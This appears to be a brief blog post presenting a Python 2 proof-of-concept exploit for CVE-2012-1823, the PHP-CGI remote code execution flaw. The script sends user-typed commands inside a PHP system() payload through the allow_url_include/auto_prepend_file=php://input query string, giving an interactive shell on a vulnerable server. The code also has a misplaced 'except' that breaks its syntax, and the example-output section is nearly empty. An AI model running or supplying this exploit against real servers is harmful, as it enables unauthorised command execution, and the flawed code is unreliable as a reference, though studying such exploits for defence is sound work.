This Proof of Concept (PoC) script exploits CVE-2012-1823 – PHP-CGI Remote Code Execution (RCE) vulnerability.  It simply wraps an HTTP POST request in an endless loop that grabs input from the user as the command to run.  The syntax demonstrated in this PoC script can be leveraged for other use cases because it demonstrates how to create HTTP requests in Python using custom HTTP headers.

 


#!/usr/bin/python
import sys, urllib2    # Import the required modules for the script

if len(sys.argv) != 2:    # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>"
  print "Usage: "+sys.argv[0]+" <URL>"
  sys.exit(0)

URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting CVE-2012-1823 - PHP-CGI RCE"

while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  command=raw_input("~$ ")
  Host = URL.split('/')[2]      # Parse host from URL: 'http://<host>/' will parse out <host>
  headers = {                   # Set the appropriate headers for the response
    'Host': Host,
    'User-Agent': 'Mozilla',
    'Connection': 'keep-alive'}
  data = "<?php system('"+command+"');die(); ?>"        # PHP to run on the server
  req = urllib2.Request(URL+"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data, headers)

  try:                    # Sets up a Try/Except loop so exceptions are handled cleanly
    response = urllib2.urlopen(req)     # Actually makes the request
    for line in response.readlines():
      print line.strip()
    except Exception as e: print e

Example Usage and Output:

php_cgi